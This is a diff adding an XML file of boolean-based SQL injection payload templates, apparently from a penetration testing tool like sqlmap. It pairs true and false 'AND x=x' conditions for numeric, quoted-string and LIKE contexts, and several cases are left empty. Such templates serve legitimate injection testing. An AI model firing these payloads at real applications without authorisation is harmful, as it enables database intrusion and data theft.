new file

xml/injection.xml

@@ -0,0 +1,29 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <case tag="custom" desc="custom">
+        <positive format="%s%s%s AND %s%d=%d %s" params="value, prefix, &quot;)&quot; * parenthesis, &quot;(&quot; * parenthesis, randInt, randInt, postfix"/>
+        <negative format="%s%s%s AND %s%d=%d %s" params="value, prefix, &quot;)&quot; * parenthesis, &quot;(&quot; * parenthesis, randInt, randInt + 1, postfix"/>
+    </case>
+    <case tag="numeric" desc="unescaped numeric">
+        <positive format="%s%s AND %s%d=%d" params="value, &quot;)&quot; * parenthesis, &quot;(&quot; * parenthesis, randInt, randInt"/>
+        <negative format="%s%s AND %s%d=%d" params="value, &quot;)&quot; * parenthesis, &quot;(&quot; * parenthesis, randInt, randInt + 1"/>
+    </case>
+    <case tag="stringsingle" desc="single quoted string">
+        <positive format="%s'%s AND %s'%s'='%s" params="value, &quot;)&quot; * parenthesis, &quot;(&quot; * parenthesis, randStr, randStr"/>
+        <negative format="%s'%s AND %s'%s'='%s" params="value, &quot;)&quot; * parenthesis, &quot;(&quot; * parenthesis, randStr, randStr + randomStr(1)"/>
+    </case>
+    <case tag="likesingle" desc="LIKE single quoted string">
+        <positive format="%s'%s AND %s'%s' LIKE '%s" params="value, &quot;)&quot; * parenthesis, &quot;(&quot; * parenthesis, randStr, randStr"/>
+        <negative format="" params=""/>
+    </case>
+    <case tag="custom" desc="custom">
+        <positive format="" params=""/>
+        <negative format="" params=""/>
+    </case>
+    <case tag="custom" desc="custom">
+        <positive format="" params=""/>
+        <negative format="" params=""/>
+    </case>
+
+</root>